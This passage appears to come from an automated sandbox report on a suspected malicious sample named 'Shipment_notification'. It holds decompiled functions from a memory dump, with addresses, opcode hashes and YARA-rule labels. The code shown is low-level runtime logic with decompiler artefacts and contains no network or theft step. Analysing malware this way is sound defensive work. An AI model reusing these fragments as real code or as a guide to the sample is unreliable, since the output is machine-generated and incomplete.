							E01B66B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01B66B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01B07D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01B29AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return L01B2B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01B04620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                0x01b67016
                                                                                0x01b6701e
                                                                                0x01b6702b
                                                                                0x01b67033
                                                                                0x01b67037
                                                                                0x01b6703c
                                                                                0x01b6703e
                                                                                0x01b67041
                                                                                0x01b67045
                                                                                0x01b6704a
                                                                                0x01b67050
                                                                                0x01b67055
                                                                                0x01b6705a
                                                                                0x01b67062
                                                                                0x01b67062
                                                                                0x01b6705a
                                                                                0x01b67064
                                                                                0x01b67064
                                                                                0x01b67067
                                                                                0x01b67071
                                                                                0x01b67096
                                                                                0x01b6709b
                                                                                0x01b670a2
                                                                                0x01b670a6
                                                                                0x01b670a7
                                                                                0x01b670ad
                                                                                0x01b670b3
                                                                                0x01b670b6
                                                                                0x01b670bb
                                                                                0x01b670c3
                                                                                0x01b670c3
                                                                                0x01b670c6
                                                                                0x01b670cd
                                                                                0x01b670dd
                                                                                0x01b670e0
                                                                                0x01b670e2
                                                                                0x01b670e2
                                                                                0x01b670ee
                                                                                0x01b67101
                                                                                0x01b670f0
                                                                                0x01b670f9
                                                                                0x01b670f9
                                                                                0x01b6710a
                                                                                0x01b6710e
                                                                                0x01b67112
                                                                                0x01b67117
                                                                                0x01b67118
                                                                                0x01b67118
                                                                                0x01b670bb
                                                                                0x01b6711d
                                                                                0x01b67123
                                                                                0x01b67131
                                                                                0x01b67131
                                                                                0x01b67136
                                                                                0x01b6713d
                                                                                0x01b6713e
                                                                                0x01b6713f
                                                                                0x01b6714a
                                                                                0x01b6714a
                                                                                0x01b67084
                                                                                0x01b67088
                                                                                0x00000000
                                                                                0x01b6708e
                                                                                0x01b6708e
                                                                                0x01b67092
                                                                                0x00000000
                                                                                0x01b67092

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0635a963c5dc146da6fe415228f0249892e241ae7042660bc6759badbb9d99f4
                                                                                • Instruction ID: b1ef9384b804d6b83b2d201a30e6278fb29ea06da81820ad794947b4c4295e1c
                                                                                • Opcode Fuzzy Hash: 0635a963c5dc146da6fe415228f0249892e241ae7042660bc6759badbb9d99f4
                                                                                • Instruction Fuzzy Hash: 6C310272604751DBC329DF28C841A6AB7E9FF98700F044A69F99887680EB34E904C7A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1A70E Relevance: .1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E01B1A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1bd7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1bd7b10 = 8;
					 *0x1bd7b14 = 0x1bd7b0c;
					 *0x1bd7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E01B1A990(0x1bd7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L01B1A840(__edx, __ecx, __ecx, _t52, 0x1bd7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1bd7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1bd7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1bd7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01B04620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1bd7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E01B2F3E0(_t50,  *0x1bd7b14, _t8 >> 3);
						_t28 =  *0x1bd7b14; // 0x0
						__eflags = _t28 - 0x1bd7b0c;
						if(_t28 != 0x1bd7b0c) {
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1bd7b14 = _t50;
						_t48 = _v12;
						 *0x1bd7b10 = _t9;
						goto L6;
					}
					 *0x1bd7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                0x01b1a713
                                                                                0x01b1a714
                                                                                0x01b1a717
                                                                                0x01b1a71d
                                                                                0x01b1a720
                                                                                0x01b1a722
                                                                                0x01b1a727
                                                                                0x01b1a74a
                                                                                0x01b1a754
                                                                                0x01b1a75e
                                                                                0x01b1a768
                                                                                0x01b1a76a
                                                                                0x01b1a773
                                                                                0x01b1a78b
                                                                                0x01b1a790
                                                                                0x01b1a792
                                                                                0x01b1a741
                                                                                0x01b1a741
                                                                                0x01b1a743
                                                                                0x01b1a749
                                                                                0x01b1a749
                                                                                0x01b1a732
                                                                                0x01b1a73a
                                                                                0x01b1a797
                                                                                0x01b1a79d
                                                                                0x01b1a7a3
                                                                                0x01b1a7a9
                                                                                0x01b1a7b6
                                                                                0x01b1a7bc
                                                                                0x01b1a7ca
                                                                                0x01b1a7e0
                                                                                0x01b1a7e2
                                                                                0x01b1a7e4
                                                                                0x01b59bf2
                                                                                0x00000000
                                                                                0x01b59bf2
                                                                                0x01b1a7ed
                                                                                0x01b1a7f2
                                                                                0x01b1a800
                                                                                0x01b1a805
                                                                                0x01b1a80d
                                                                                0x01b1a812
                                                                                0x01b59c08
                                                                                0x01b59c08
                                                                                0x01b1a818
                                                                                0x01b1a81b
                                                                                0x01b1a821
                                                                                0x01b1a824
                                                                                0x00000000
                                                                                0x01b1a824
                                                                                0x01b1a7ae
                                                                                0x00000000
                                                                                0x01b1a7ae
                                                                                0x01b1a73c
                                                                                0x01b1a73e
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8eca434754b1d1ea2f3f732ae9517012ae2b5969e171a40d7eed2be405ff9db3
                                                                                • Instruction ID: 2bdb9b869bba3ea828eec0d1bf0a5fb7551b9131056eefe2568f33fef53e3532
                                                                                • Opcode Fuzzy Hash: 8eca434754b1d1ea2f3f732ae9517012ae2b5969e171a40d7eed2be405ff9db3
                                                                                • Instruction Fuzzy Hash: 9B3106B1222241DFD72DCF18D8B0FA57BF9FB84714F41099AEA45C7248EB70AA01C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B161A0 Relevance: .1, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E01B161A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = L01B15E50(0x1ac67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01BB9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E01AEF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                0x01b161b3
                                                                                0x01b161b5
                                                                                0x01b161bd
                                                                                0x01b161c3
                                                                                0x01b161c7
                                                                                0x01b161d2
                                                                                0x01b161ff
                                                                                0x01b161ff
                                                                                0x01b16201
                                                                                0x01b16207
                                                                                0x01b16207
                                                                                0x01b161d4
                                                                                0x01b161d9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b161df
                                                                                0x01b161e2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b161e6
                                                                                0x01b161e8
                                                                                0x01b161ee
                                                                                0x01b161ee
                                                                                0x01b161f9
                                                                                0x01b5762f
                                                                                0x01b57632
                                                                                0x01b57635
                                                                                0x01b57639
                                                                                0x01b57640
                                                                                0x01b5766e
                                                                                0x01b57675
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b57681
                                                                                0x01b57689
                                                                                0x01b5768d
                                                                                0x01b57691
                                                                                0x01b57695
                                                                                0x01b57699
                                                                                0x01b576af
                                                                                0x01b576b5
                                                                                0x01b576b7
                                                                                0x01b576b7
                                                                                0x01b576d7
                                                                                0x01b576dc
                                                                                0x00000000
                                                                                0x01b576dc
                                                                                0x01b576a2
                                                                                0x01b576a9
                                                                                0x01b57651
                                                                                0x01b57653
                                                                                0x01b57653
                                                                                0x01b57656
                                                                                0x01b57656
                                                                                0x00000000
                                                                                0x01b57656
                                                                                0x01b57644
                                                                                0x01b57646
                                                                                0x01b57648
                                                                                0x01b57648
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d049a4ea7eb7d0b3cce35b5469f918114cce68288edb20b9f0b1535f1bc856dc
                                                                                • Instruction ID: 0249d78eea6985729ee1296d6a888f193d259c4b8ff30ebef2cd17fb8a341e1c
                                                                                • Opcode Fuzzy Hash: d049a4ea7eb7d0b3cce35b5469f918114cce68288edb20b9f0b1535f1bc856dc
                                                                                • Instruction Fuzzy Hash: 97318F716057019FE368CF1DC940B26BBE5FB88B00F9549ADF99897351EBB0D804CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AEAA16 Relevance: .1, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E01AEAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x1bdd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1bd7b9c; // 0x0
					_t53 = L01B04620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return L01B2B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E01B2F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01AF6C59(_t53, _t51, _t58) != 0) {
							_t28 = L01B15E50(0x1acc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E01B1B230(_v32, _v28, 0x1acc2d8, 1,  &_v24);
								_t28 = E01AEF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                0x01aeaa25
                                                                                0x01aeaa29
                                                                                0x01aeaa2d
                                                                                0x01aeaa30
                                                                                0x01aeaa37
                                                                                0x01aeaa3c
                                                                                0x01b44458
                                                                                0x01b44458
                                                                                0x01b44472
                                                                                0x01b44474
                                                                                0x01b44476
                                                                                0x01aeaa64
                                                                                0x01aeaa74
                                                                                0x01b4447c
                                                                                0x01b44483
                                                                                0x01b44492
                                                                                0x01aeaa52
                                                                                0x01aeaa54
                                                                                0x01aeaa5e
                                                                                0x01b444a8
                                                                                0x01b444ad
                                                                                0x01b444af
                                                                                0x01b444b6
                                                                                0x01b444b6
                                                                                0x01b444b9
                                                                                0x01b444bc
                                                                                0x01b444cd
                                                                                0x01b444d3
                                                                                0x01b444d6
                                                                                0x01b444e1
                                                                                0x01b444e1
                                                                                0x01b444e6
                                                                                0x01b444e8
                                                                                0x01b444fb
                                                                                0x01b444fb
                                                                                0x01b444e8
                                                                                0x00000000
                                                                                0x01aeaa5e
                                                                                0x01b44476
                                                                                0x01aeaa42
                                                                                0x01aeaa46
                                                                                0x01aeaa48
                                                                                0x01aeaa4c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e3a7cfb34c9db18afb85a7728dae0146a089f0a44c0677a24742390c6e1ba505
                                                                                • Instruction ID: 23e7dc51496d11233a9401187498fc755445a0fb508403e3189d81c1d055afc4
                                                                                • Opcode Fuzzy Hash: e3a7cfb34c9db18afb85a7728dae0146a089f0a44c0677a24742390c6e1ba505
                                                                                • Instruction Fuzzy Hash: 8D31E571A00619ABCF199FA8CE81A7FB7B9FF44700F0144ADF905D7140EB349911D7A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B24A2C Relevance: .1, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E01B24A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x1bdd360 ^ _t62;
				_v8 =  *0x1bdd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01B02280(_t26, 0x1bd8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E01AFFFB0(_t41, _t51, 0x1bd8608);
						L2:
						 *0x1bdb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return L01B2B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01B02280(_t28, 0x1bd8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E01AFFFB0(_t42, _t53, 0x1bd8608);
							if(_t53 != 0) {
								L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E01AFFFB0(_t41, _t51, 0x1bd8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                0x01b24a2c
                                                                                0x01b24a34
                                                                                0x01b24a3c
                                                                                0x01b24a3e
                                                                                0x01b24a48
                                                                                0x01b24a4b
                                                                                0x01b24a4d
                                                                                0x01b24a51
                                                                                0x01b24a9c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b24aa3
                                                                                0x01b24aa8
                                                                                0x01b24aad
                                                                                0x01b24ab1
                                                                                0x01b24ade
                                                                                0x01b24ae3
                                                                                0x01b24a5a
                                                                                0x01b24a62
                                                                                0x01b24a6a
                                                                                0x01b24a6e
                                                                                0x01b5f203
                                                                                0x01b24a84
                                                                                0x01b24a88
                                                                                0x01b24a89
                                                                                0x01b24a8a
                                                                                0x01b24a95
                                                                                0x01b24a95
                                                                                0x01b24a79
                                                                                0x01b24a80
                                                                                0x01b24af2
                                                                                0x01b24af4
                                                                                0x01b24af9
                                                                                0x01b24aff
                                                                                0x01b24b01
                                                                                0x01b24b03
                                                                                0x01b24b08
                                                                                0x01b5f20a
                                                                                0x01b5f212
                                                                                0x01b5f216
                                                                                0x01b5f216
                                                                                0x01b24b08
                                                                                0x01b24b13
                                                                                0x01b24b1a
                                                                                0x01b5f229
                                                                                0x01b5f229
                                                                                0x01b24b1a
                                                                                0x01b24a82
                                                                                0x00000000
                                                                                0x01b24a82
                                                                                0x01b24ab7
                                                                                0x01b24acd
                                                                                0x01b24acd
                                                                                0x01b24ad5
                                                                                0x01b24ada
                                                                                0x00000000
                                                                                0x01b24ada
                                                                                0x01b24ac2
                                                                                0x01b24acb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b24acb
                                                                                0x01b24a53
                                                                                0x01b24a53
                                                                                0x01b24a58
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 467386bfb9b4af948b2b24ee1bb0d190dd86cae9a0b7e98ed0ad9fcd1dffdd74
                                                                                • Instruction ID: 3c93274edf2c967e18336fa4c3307232b28ba6aca07a540120712f8037d0d38b
                                                                                • Opcode Fuzzy Hash: 467386bfb9b4af948b2b24ee1bb0d190dd86cae9a0b7e98ed0ad9fcd1dffdd74
                                                                                • Instruction Fuzzy Hash: F031E2322066619BC72A9F59C984B2AFBA4FF82710F0045EDF95A4BA51DB70D808CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1E730 Relevance: .1, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 74%
                                                                                			E01B1E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(L01B29670() < 0) {
					L01B3DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1bd7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01B04620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M01B1E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                0x01b1e730
                                                                                0x01b1e736
                                                                                0x01b1e738
                                                                                0x01b1e73d
                                                                                0x01b1e73e
                                                                                0x01b1e740
                                                                                0x01b1e749
                                                                                0x01b1e765
                                                                                0x01b1e76a
                                                                                0x01b1e76b
                                                                                0x01b1e76c
                                                                                0x01b1e76d
                                                                                0x01b1e76e
                                                                                0x01b1e76f
                                                                                0x01b1e775
                                                                                0x01b1e777
                                                                                0x01b1e77e
                                                                                0x01b5b675
                                                                                0x01b1e784
                                                                                0x01b1e784
                                                                                0x01b1e789
                                                                                0x01b1e7a8
                                                                                0x01b1e7ac
                                                                                0x01b1e807
                                                                                0x01b1e7ae
                                                                                0x01b1e7ae
                                                                                0x01b1e7b1
                                                                                0x01b1e7b4
                                                                                0x01b1e7b9
                                                                                0x01b1e7c0
                                                                                0x01b1e7c4
                                                                                0x01b1e7ca
                                                                                0x01b1e7cc
                                                                                0x00000000
                                                                                0x01b1e7d3
                                                                                0x01b1e7d6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1e7ff
                                                                                0x01b1e802
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1e7f9
                                                                                0x01b1e7fc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1e7f3
                                                                                0x01b1e7f6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1e7ed
                                                                                0x01b1e7f0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1e7e7
                                                                                0x01b1e7ea
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5b685
                                                                                0x01b5b688
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5b682
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1e7cc
                                                                                0x01b1e7d9
                                                                                0x01b1e7dc
                                                                                0x01b1e7de
                                                                                0x01b1e7de
                                                                                0x01b1e7ac
                                                                                0x01b1e7e4
                                                                                0x01b1e74b
                                                                                0x01b1e751
                                                                                0x01b1e759
                                                                                0x01b1e761
                                                                                0x01b1e761

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3dfdd7fb69461e35e72612c6e8c751b55ad467d2ccdb19a4a00e1ea99c479e33
                                                                                • Instruction ID: 0a8323084c682836a910c9eb6c7626d040646698309dfdb3e1d772e5edf1064f
                                                                                • Opcode Fuzzy Hash: 3dfdd7fb69461e35e72612c6e8c751b55ad467d2ccdb19a4a00e1ea99c479e33
                                                                                • Instruction Fuzzy Hash: D6318E75A14249EFE749CF58D841B96BBE4FB08314F5582A6FD08CB341D731E890CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1BC2C Relevance: .1, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E01B1BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1bd6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01B02280(0xd, 0x8b2f1a0);
				_t41 =  *0x1bd60f8; // 0x0
				if(_t41 != 0) {
					 *0x1bd60f8 =  *_t41;
					 *0x1bd60fc =  *0x1bd60fc + 0xffff;
				}
				E01AFFFB0(_t41, 0x800, 0x8b2f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
